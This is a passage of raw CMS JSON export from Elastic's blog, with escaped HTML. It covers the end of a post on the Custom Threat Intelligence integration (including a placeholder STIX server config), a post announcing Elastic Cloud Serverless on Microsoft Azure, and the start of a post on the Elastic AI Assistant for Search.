retrieval intervals. Following the example above, the CEL state for this case could look like this.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs31c23b2af627ca12"}}},{"code":{"code":"url: \"https://stix-server.example.com\"\nusername: \"\u003cUSERNAME\u003e\"\npassword: \"\u003cPASSWORD\u003e\"\ninitial_interval: \"120h\"","_metadata":{"uid":"cs326888d13fb58fa3"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb8295e2e2fdfb169"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eWhen adding a CEL program to the Custom Threat Intelligence integration, ensure the \u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cem\u003eEnable TAXII 2.1\u003c/em\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e toggle is disabled, and paste the CEL program and its initial state into the designated blocks in the integration’s configuration.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1e0c682a2eeb72c0"}}},{"image":{"image":{"uid":"blta15a552588261ceb","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T03:52:20.765Z","created_by":"bltb6c155cd84fc0c1a","file_size":"69680","filename":"Screenshot_2024-11-17_at_10.52.13_PM.png","parent_uid":null,"tags":[],"title":"Screenshot 2024-11-17 at 10.52.13 PM.png","updated_at":"2024-11-18T03:52:20.765Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-19T14:00:00.408Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta15a552588261ceb/673ab9f4b35d6679916d896b/Screenshot_2024-11-17_at_10.52.13_PM.png"},"_metadata":{"uid":"cs91d9576e92b116a2"},"caption_l10n":"CEL configuration for the integration","alt_text_l10n":"CEL configuration for the integration","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1a91d80faac4fa75"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eThis example provides a generic template for using CEL programs to retrieve threat intelligence from STIX APIs. However, users will likely need to adapt the program based on the specific requirements of their STIX server — paying particular attention to query parameters, required headers, and the structure of the response body.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Bring threat data into your security infrastructure easily","_metadata":{"uid":"cs04aa929df9b13815"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eElastic’s Custom Threat Intelligence integration makes it easy to bring threat data into your security infrastructure — giving you more insights to catch and respond to threats faster. With support for STIX 2.1 indicators, connections to TAXII servers, and flexible CEL configurations, this integration is built to fit your specific needs — turning threat intelligence indicators into ECS format so that it works seamlessly across the Elastic Search AI Platform.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eWe’re excited for you to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/ti_custom\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003etry out these features\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e, explore new use cases, and share your feedback to help us continue evolving threat intelligence capabilities within Elastic.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs00a299bc53e92115"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4a1475954efed6a8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc79f48daf45c02b4"}}}],"publish_date":"2024-11-19","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltbf6fd364f32f8563","ACL":{},"created_at":"2023-11-06T21:50:46.524Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fleet-elastic-agent","label_l10n":"Fleet/Elastic Agent","tags":[],"title":"Fleet/Elastic Agent","updated_at":"2023-11-06T21:50:46.524Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:48:26.489Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt39140cf3e2cd4550","ACL":{},"created_at":"2023-11-06T21:51:00.583Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"integrations","label_l10n":"Integrations","tags":[],"title":"Integrations","updated_at":"2023-11-06T21:51:00.583Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.083Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"title":"Ingesting","label_l10n":"Ingesting","keyword":"ingesting","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt886805f7b26ef356","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:57.513Z","updated_at":"2020-06-17T03:37:57.513Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:57.513Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-29T17:20:06.688Z","user":"bltea6cbb86fea188be"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Investigation \u0026 incident response","label_l10n":"Investigation \u0026 incident response","keyword":"investigation-incident-response","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt43660d1624e728b9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:40:59.781Z","updated_at":"2023-11-06T20:41:24.521Z","ACL":{},"_version":2,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.865Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Automated threat protection","label_l10n":"Automated threat protection","keyword":"automated-threat-protection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt49e356fcb7971aca","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:22.822Z","updated_at":"2023-11-06T20:08:22.822Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.794Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt1c3e638bb361b5b7","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-18T04:14:16.357Z","created_by":"bltb6c155cd84fc0c1a","file_size":"167110","filename":"145070_-_Blog_header_image_Switching_from_the_Java_High_Level_(1).jpg","parent_uid":null,"tags":[],"title":"145070 - Blog header image Switching from the Java High Level (1).jpg","updated_at":"2024-11-18T04:14:16.357Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-19T14:00:00.353Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1c3e638bb361b5b7/673abf1866a4f3cb560cbd56/145070_-_Blog_header_image_Switching_from_the_Java_High_Level_(1).jpg"},"title":"Elastic’s new Custom Threat Intelligence integration","title_l10n":"Elastic’s new Custom Threat Intelligence integration","updated_at":"2024-11-18T04:14:18.666Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/custom-threat-intelligence-integration","publish_details":{"time":"2024-11-19T14:00:00.313Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltda37bd043e25c173","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic is expanding cloud capabilities via a serverless product on Microsoft Azure. This new solution simplifies deployment, scales automatically, and integrates seamlessly with Azure services, enhancing performance and reducing management overhead.","author":["blt86d32979f49901de","blt3f02e05e41c2a581"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-18T02:59:09.104Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa2c007a6b0bc0b26"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’re excited to share that Elastic Cloud Serverless will soon be available on Microsoft Azure! This new offering provides all the power of Elastic’s solutions in a fully managed, serverless experience. Built on a new Search AI Lake architecture it combines vast storage and low latency querying at scale with all of the strengths of Elasticsearch’s AI and search capabilities.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"A reimagined serverless Elasticsearch architecture on Microsoft Azure","_metadata":{"uid":"cs9dac28f11f4b4c94"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBuilding on the success of \u003c/span\u003e\u003ca href=\"https://learn.microsoft.com/en-us/azure/partner-solutions/elastic/overview\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eElastic's Azure Native ISV Service\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and \u003c/span\u003e\u003ca href=\"https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?tab=Overview\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eits availability on the Azure Marketplace\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, Elastic Cloud Serverless on Microsoft Azure takes cloud innovation a step further.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs we think about the next decade, we recognize the need for a simpler user experience that still delivers fast performance. Elastic Cloud Serverless now provides hassle-free operations with no backend management, instant serverless project configuration, guided onboarding for rapid results, and a project-based setup tailored to each unique solution. Just bring your data and queries, and the platform handles all the scaling and management. Use the trusted partnership between Elastic and Microsoft Azure to enhance performance and efficiency.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003eElastic Cloud Serverless is built on a new \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/search-ai-lake-elastic-cloud-serverless\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSearch AI Lake architecture\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e, which introduces a stateless Elasticsearch that decouples compute from storage and indexing from search. It uses cost-efficient object storage for seamless scalability while preserving Elasticsearch's fast, low-latency queries. This enables boundless storage for real-time solutions without operational overhead\u003c/span\u003e\u003cspan style=\"font-size: 13pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBy choosing Microsoft Azure, we’re enabling customers to tap into its powerful ecosystem, gaining advantages in terms of seamless integration with Azure services, enterprise-grade security, and robust global infrastructure.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Start and scale quickly with Elastic Cloud Serverless on Azure","_metadata":{"uid":"cs8c0904e9cb1ef82b"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eNo compromise on speed or scale:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elasticsearch Serverless dynamically scales based on your workload, allowing you to handle unpredictable traffic and data spikes without needing manual intervention. All while offering low latency search on boundless object storage.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eHassle-free operations:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Say goodbye to managing clusters, provisioning resources, or fine-tuning performance. With serverless, you get hassle-free operations — no need to manage backend infrastructure, do capacity planning, upgrade, or scale data. You also get instant configuration —start a new fully configured serverless project in a snap.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSeamless integration with Azure services:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic Cloud Serverless on Azure will integrate natively with services like Azure Blob Storage, Event Hubs, and Azure Active Directory — giving you a unified and streamlined experience for your data workflows.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEnterprise-grade security:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Using Microsoft Azure’s built-in security features, Elasticsearch Serverless ensures that your data is secure, encrypted, and compliant with the most rigorous industry standards.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor a deeper dive into the technical details of how Elastic Cloud Serverless \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003etakes advantage of the latest cloud-native services\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, including architecture and use cases, check out \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-serverless-architecture\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eServe more with serverless\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What’s next?","_metadata":{"uid":"cs7c47857f3dcf5311"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis is just the beginning. The Elastic Cloud Serverless on Azure offering will enter technical preview soon, and we can’t wait for you to get your hands on it. We believe this serverless option will not only simplify the way you deploy and manage Elasticsearch but also unlock new opportunities for you to innovate and scale on the Azure cloud platform.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStay tuned for more details on how you can sign up for early access and get started with Elastic Cloud Serverless on Microsoft Azure. We’re thrilled to bring this new chapter of Elasticsearch to Azure and look forward to seeing the incredible solutions you will build with it!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs24722c1d31778e03"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf2ef1a5bfcc6f53d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs096037cf4e0c9d3f"}}}],"publish_date":"2024-11-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elastic Cloud Serverless coming soon on Microsoft Azure for cost-efficient scalability","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Unlock effortless deployment and automatic scaling with Elastic's new serverless offering on Microsoft Azure","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"bltada2311dae66943e","_content_type_uid":"tags_partner"}],"tags_topic":[{"title":"Architecture","label_l10n":"Architecture","keyword":"architecture","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt91896b1dfcbd6413","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:39:38.693Z","updated_at":"2020-06-17T03:39:38.693Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:39:38.693Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-24T15:31:11.375Z","user":"bltf6ab93733e4e3a73"}},{"title":"Customer experience","label_l10n":"Customer experience","keyword":"customer-experience","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt25722919b3bca233","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T22:34:27.803Z","updated_at":"2021-12-16T22:34:27.803Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:15:55.021Z","user":"blt3044324473ef223b70bc674c"}},{"title":"Scaling","label_l10n":"Scaling","keyword":"scaling","hidden_value":true,"tags":[],"locale":"en-us","uid":"bltbafe1bd178271a4e","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:40:27.127Z","updated_at":"2020-06-17T03:40:27.127Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:40:27.127Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-23T10:32:18.015Z","user":"blt3e52848e0cb3c394"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt8617d65f559b9a82","ACL":{},"created_at":"2023-11-06T20:42:46.365Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"microsoft-azure","label_l10n":"Microsoft Azure","tags":[],"title":"Microsoft Azure","updated_at":"2023-11-06T20:42:46.365Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:19.197Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltf728cae98ddf1b5c","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-18T02:53:37.580Z","created_by":"bltb6c155cd84fc0c1a","file_size":"101161","filename":"137714_-_Blog_header_Option_1.jpg","parent_uid":null,"tags":[],"title":"137714 - Blog header_Option 1.jpg","updated_at":"2024-11-18T02:53:37.580Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-18T14:00:01.785Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf728cae98ddf1b5c/673aac312f94ea072472704b/137714_-_Blog_header_Option_1.jpg"},"title":"Elastic Cloud Serverless on Microsoft Azure: Coming soon!","title_l10n":"Elastic Cloud Serverless on Microsoft Azure: Coming soon! ","updated_at":"2024-11-18T03:01:21.759Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-cloud-serverless-microsoft-azure","publish_details":{"time":"2024-11-18T14:00:01.749Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta71996c23ff22b99","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic’s new AI Assistant for Search will be available soon. It can use Azure OpenAI models to be the built-in copilot for developers building with Elasticsearch from within Kibana to make interactions within Elastic smoother and more intuitive.","author":["blt3f02e05e41c2a581"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-18T02:40:10.809Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cseb8401fb078962f6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch has something new in store: the Elastic AI Assistant for Search. Think of it as a built-in guide for developers working within Elasticsearch and Kibana — designed to answer questions, walk you through features, and make your life a bit easier. Powered by Microsoft AI Services, it brings in retrieval augmented generation (RAG) to make interactions with Elastic’s search solution smoother and more intuitive.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9b2e925c0d1e3b5a"}}},{"image":{"image":{"uid":"bltf1c8aaab81849675","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T02:36:57.162Z","created_by":"bltb6c155cd84fc0c1a","file_size":"607071","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-11-18T02:36:57.162Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-18T14:00:02.215Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf1c8aaab81849675/673aa849c04825d431a84ca0/image2.png"},"_metadata":{"uid":"cs42e5e073635e1cfc"},"caption_l10n":"","alt_text_l10n":"Elastic AI Assistant for Search","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"A developer-friendly help center right where you need it","_metadata":{"uid":"cs52c02672ff4fc397"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith Elastic AI Assistant, you’re not just getting documentation — you’re getting an in-product assistant that knows the Elasticsearch and Kibana landscape. This assistant makes it easy to explore Elastic’s tools, guiding you through key tasks like dashboard creation and report generation.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBuilt for developers: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThe assistant is specifically tailored for developers with insights on Elasticsearch features, APIs, and workflows.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eReady to use out of the box:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e No extensive setup needed — the assistant comes preloaded with Elastic’s own AI defaults, so you can get help right away.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Elastic documentation at your fingertips","_metadata":{"uid":"cs7ac9264e0159f7ce"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic AI Assistant integrates directly with Elastic’s documentation. No more flipping between windows or tabs to find the right section — just ask the assistant, and it will bring up relevant guides and tutorials.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eQuick documentation access:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Have questions? Get instant answers from Elastic’s library — all while staying in your current workflow.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eContextual help:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The assistant knows what you’re working on, so it brings up the sections that actually matter right when you need them.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Smarter responses in Kibana","_metadata":{"uid":"cs61152e4c75652d39"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen working in Kibana, the assistant’s RAG-based approach really shines. By tapping into Microsoft AI Services, it can better understand your search context and respond with helpful guidance tailored to Kibana workflows.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eContext-aware help:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The assistant’s responses are crafted based on what you’re doing in Kibana, making it easier to navigate through complex tasks.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eTask-specific guidance: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eWhether you’re building dashboards or visualizing data, the assistant provides guidance that’s relevant to the task at hand.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Microsoft OpenAI Services powering the Assistant","_metadata":{"uid":"cs253caa85837c85a3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe heavy lifting behind Elastic AI Assistant is done by Microsoft Azure OpenAI Services, which adds robust language capabilities. This means the assistant can handle more complex, nuanced queries and provide answers that fit right into what you’re working on.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDetailed, contextual responses:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Microsoft AI models ensure the assistant delivers precise answers that make Elasticsearch and Kibana more approachable.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEnterprise-grade security:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e All interactions are secured by Azure, meeting the compliance needs of even the most regulated industries.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/assistant-connect-to-azure-openai.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eSee detailed instructions for setting up your Azure OpenAI connector\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 